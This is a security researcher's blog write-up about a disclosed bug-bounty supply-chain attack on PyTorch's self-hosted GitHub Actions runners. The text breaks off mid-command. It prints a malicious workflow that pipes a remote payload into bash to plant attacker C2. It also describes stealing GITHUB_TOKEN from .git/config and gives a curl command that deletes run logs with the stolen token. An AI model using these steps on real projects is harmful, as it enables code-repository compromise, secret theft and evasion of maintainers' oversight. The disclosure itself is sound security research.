https://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/ John Stawinski IV Making Hacking Accessible [coffee3-2] * Blog * About Me * Contact + Newsletter January 11, 2024 Playing with Fire - How We Executed a Critical Supply Chain Attack on PyTorch Security tends to lag behind adoption, and AI/ML is no exception. Four months ago, Adnan Khan and I exploited a critical CI/CD vulnerability in PyTorch, one of the world's leading ML platforms. Used by titans like Google, Meta, Boeing, and Lockheed Martin, PyTorch is a major target for hackers and nation-states alike. Thankfully, we exploited this vulnerability before the bad guys. Here is how we did it. Background Before we dive in, let's scope out and discuss why Adnan and I were looking at an ML repository. Let me give you a hint -- it was not to gawk at the neural networks. In fact, I don't know enough about neural networks to be qualified to gawk. PyTorch was one of the first steps on a journey Adnan and I started six months ago, based on CI/CD research and exploit development we performed in the summer of 2023. Adnan started the bug bounty foray by leveraging these attacks to exploit a critical vulnerability in GitHub that allowed him to backdoor all of GitHub's and Azure's runner images, collecting a $20,000 reward. Following this attack, we teamed up to discover other vulnerable repositories. The results of our research surprised everyone, including ourselves, as we continuously executed supply chain compromises of leading ML platforms, billion-dollar Blockchains, and more. In the seven days since we released our initial blog posts, they've caught on in the security world. But, you probably didn't come here to read about our journey; you came to read about the messy details of our attack on PyTorch. Let's begin. Tell Me the Impact Our exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS, potentially add code to the main repository branch, backdoor PyTorch dependencies - the list goes on. In short, it was bad. Quite bad. As we've seen before with SolarWinds, Ledger, and others, supply chain attacks like this are killer from an attacker's perspective. With this level of access, any respectable nation-state would have several paths to a PyTorch supply chain compromise. GitHub Actions Primer To understand our exploit, you need to understand GitHub Actions. Want to skip around? Go ahead. 1. Background 2. Tell Me the Impact 3. GitHub Actions Primer 1. Self-Hosted Runners 4. Identifying the Vulnerability 1. Identifying Self-Hosted Runners 2. Determining Workflow Approval Requirements 3. Searching for Impact 5. Executing the Attack 1. 1. Fixing a Typo 2. 2. Preparing the Payload 6. Post Exploitation 1. The Great Secret Heist 1. The Magical GITHUB_TOKEN 2. Covering our Tracks 3. Modifying Repository Releases 4. Repository Secrets 5. PAT Access 6. AWS Access 7. Submission Details - No Bueno 1. Timeline 8. Mitigations 9. Is PyTorch an Outlier? 10. References If you've never worked with GitHub Actions or similar CI/CD platforms, I recommend reading up before continuing this blog post. Actually, if I lose you at any point, go and Google the technology that confused you. Typically, I like to start from the very basics in my articles, but explaining all the involved CI/CD processes would be a novel in itself. In short, GitHub Actions allow the execution of code specified within workflows as part of the CI/CD process. For example, let's say PyTorch wants to run a set of tests when a GitHub user submits a pull request. PyTorch can define these tests in a YAML workflow file used by GitHub Actions and configure the workflow to run on the pull_request trigger. Now, whenever a user submits a pull request, the tests will execute on a runner. This way, repository maintainers don't need to manually test everyone's code before merging. The public PyTorch repository uses GitHub Actions extensively for CI/ CD. Actually, extensively is an understatement. PyTorch has over 70 different GitHub workflows and typically runs over ten workflows every hour. One of the most difficult parts of this operation was scrolling through all of the different workflows to select the ones we were interested in. GitHub Actions workflows execute on two types of build runners. One type is GitHub's hosted runners, which GitHub maintains and hosts in their environment. The other class is self-hosted runners. Self-Hosted Runners Self-hosted runners are build agents hosted by end users running the Actions runner agent on their own infrastructure. In less technical terms, a "self-hosted runner" is a machine, VM, or container configured to run GitHub workflows from a GitHub organization or repository. Securing and protecting the runners is the responsibility of end users, not GitHub, which is why GitHub recommends against using self-hosted runners on public repositories. Apparently, not everyone listens to GitHub, including GitHub. It doesn't help that some of GitHub's default settings are less than secure. By default, when a self-hosted runner is attached to a repository, any of that repository's workflows can use that runner. This setting also applies to workflows from fork pull requests. Remember that anyone can submit a fork pull request to a public GitHub repository. Yes, even you. The result of these settings is that, by default, any repository contributor can execute code on the self-hosted runner by submitting a malicious PR. Note: A "contributor" to a GitHub repository is anyone who has added code to the repository. Typically, someone becomes a contributor by submitting a pull request that then gets merged into the default branch. More on this later. If the self-hosted runner is configured using the default steps, it will be a non-ephemeral self-hosted runner. This means that the malicious workflow can start a process in the background that will continue to run after the job completes, and modifications to files (such as programs on the path, etc.) will persist past the current workflow. It also means that future workflows will run on that same runner. Identifying the Vulnerability Identifying Self-Hosted Runners To identify self-hosted runners, we ran Gato, a GitHub attack and exploitation tool developed by Praetorian. Among other things, Gato can enumerate the existence of self-hosted runners within a repository by examining GitHub workflow files and run logs. Gato identified several persistent, self-hosted runners used by the PyTorch repository. We looked at repository workflow logs to confirm the Gato output. [image-2] The name "worker-rocm-amd-30" indicates the runner is self-hosted. Determining Workflow Approval Requirements Even though PyTorch used self-hosted runners, one major thing could still stop us. The default setting for workflow execution from fork PRs requires approval only for accounts that have not previously contributed to the repository. However, there is an option to allow workflow approval for all fork PRs, including previous contributors. We set out to discover the status of this setting. Viewing the pull request (PR) history, we found several PRs from previous contributors that triggered pull_request workflows without requiring approval. This indicated that the repository did not require workflow approval for Fork PRs from previous contributors. Bingo. [image-12] Nobody had approved this fork PR workflow, yet the "Lint / quick-checks / linux-job" workflow ran on pull_request, indicating the default approval setting was likely in place. Searching for Impact Before executing these attacks, we like to identify GitHub secrets that we may be able to steal after landing on the runner. Workflow files revealed several GitHub secrets used by PyTorch, including but not limited to: * "aws-pytorch-uploader-secret-access-key" * "aws-access-key-id" * "GH_PYTORCHBOT_TOKEN" (GitHub Personal Access Token) * "UPDATEBOT_TOKEN" (GitHub Personal Access Token) * "conda-pytorchbot-token" We were psyched when we saw the GH_PYTORCHBOT_TOKEN and UPDATEBOT_TOKEN. A PAT is one of your most valuable weapons if you want to launch a supply chain attack. Using self-hosted runners to compromise GitHub secrets is not always possible. Much of our research has been around self-hosted runner post-exploitation; figuring out methods to go from runner to secrets. PyTorch provided a great opportunity to test these techniques in the wild. Executing the Attack 1. Fixing a Typo We needed to be a contributor to the PyTorch repository to execute workflows, but we didn't feel like spending time adding features to PyTorch. Instead, we found a typo in a markdown file and submitted a fix. Another win for the Grammar Police. [image-11] Yes, I'm re-using this meme from my last article, but it fits too well. 2. Preparing the Payload Now we had to craft a workflow payload that would allow us to obtain persistence on the self-hosted runner. Red Teamers know that installing persistence in production environments typically isn't as trivial as a reverse Netcat shell. EDR, firewalls, packet inspection, and more can be in play, particularly in large corporate environments. When we started these attacks, we asked ourselves the following question - what could we use for C2 that we know for sure would bypass EDR with traffic that would not be blocked by any firewall? The answer is elegant and obvious - we could install another self-hosted GitHub runner and attach it to our private GitHub organization. Our "Runner on Runner" (RoR) technique uses the same servers for C2 as the existing runner, and the only binary we drop is the official GitHub runner agent binary, which is already running on the system. See ya, EDR and firewall protections. We created a script to automate the runner registration process and included that as our malicious workflow payload. Storing our payload in a gist, we submitted a malicious draft PR. The modified workflow looked something like this: name: " pre-commit" run-name: "Refactoring and cleanup" on: pull_request: branches: main jobs: build: name: Linux ARM64 runs-on: ${{ matrix.os }} strategy: matrix: os: [ {system: "ARM64", name: "Linux ARM64"}, {system: "benchmark", name: "Linux Intel"}, {system: "glue-notify", name: "Windows Intel"} ] steps: - name: Lint Code Base continue-on-error: true env: VERSION: ${{ matrix.version }} SYSTEM_NAME: ${{ matrix.os }} run: curl | bash This workflow executes the RoR gist payload on three of PyTorch's self-hosted runners - a Linux ARM64 machine named "ARM64", an Intel device named "benchmark," and a Windows box named "glue-notify." Enabling draft status ensured that repository maintainers wouldn't receive a notification. However, with the complexity of PyTorch's CI/ CD environment, I'd be surprised if they noticed either way. We submitted the PR and installed our RoR C2 on each self-hosted runner. [image-7] We used our C2 repository to execute the pwd && ls && /home && ip a command on the runner labeled "jenkins-worker-rocm-amd-34", confirming stable C2 and remote code execution. We also ran sudo -l to confirm we had root access. Post Exploitation We now had root a self-hosted runner. So what? We had seen previous reports of gaining RCE on self-hosted runners, and they were often met with ambiguous responses due to their ambiguous impact. Given the complexity of these attacks, we wanted to demonstrate a legitimate impact on PyTorch to convince them to take our report seriously. And we had some cool new post-exploitation techniques we'd been wanting to try. The Great Secret Heist In cloud and CI/CD environments, secrets are king. When we began our post-exploitation research, we focused on the secrets an attacker could steal and leverage in a typical self-hosted runner setup. Most of the secret stealing starts with the GITHUB_TOKEN. The Magical GITHUB_TOKEN Typically, a workflow needs to checkout a GitHub repository to the runner's filesystem, whether to run tests defined in the repository, commit changes, or even publish releases. The workflow can use a GITHUB_TOKEN to authenticate to GitHub and perform these operations. GITHUB_TOKEN permissions can vary from read-only access to extensive write privileges over the repository. If a workflow executes on a self-hosted runner and uses a GITHUB_TOKEN, that token will be on the runner for the duration of that build. PyTorch had several workflows that used the actions/checkout step with a GITHUB_TOKEN that had write permissions. For example, by searching through workflow logs, we can see the periodic.yml workflow also ran on the jenkins-worker-rocm-amd-34 self-hosted runner. The logs confirmed that this workflow used a GITHUB_TOKEN with extensive write permissions. [image-3] This token would only be valid for the life of that particular build. However, we developed some special techniques to extend the build length once you are on the runner (more on this in a future post). Due to the insane number of workflows that run daily from the PyTorch repository, we were not worried about tokens expiring, as we could always compromise another one. When a workflow uses the actions/checkout step, the GITHUB_TOKEN is stored in the .git/config file of the checked-out repository on the self-hosted runner during an active workflow. Since we controlled the runner, all we had to do was wait until a non-PR workflow ran on the runner with a privileged GITHUB_TOKEN and then print out the contents of the config file. [image-6] We used our RoR C2 to steal the GITHUB_TOKEN of an ongoing workflow with write permissions. Covering our Tracks Our first use of the GITHUB_TOKEN was to eliminate the run logs from our malicious pull request. We wanted a full day to perform post-exploitation and didn't want to cause any alarms from our activity. We used the GitHub API along with the token to delete the run logs for each of the workflows our PR triggered. Stealth mode = activated. curl -L \ -X DELETE \ -H "Accept: application/vnd.github+json" \ -H "Authorization: Bearer $STOLEN_TOKEN" \ -H "X-GitHub-Api-Version: 2022-11-28" \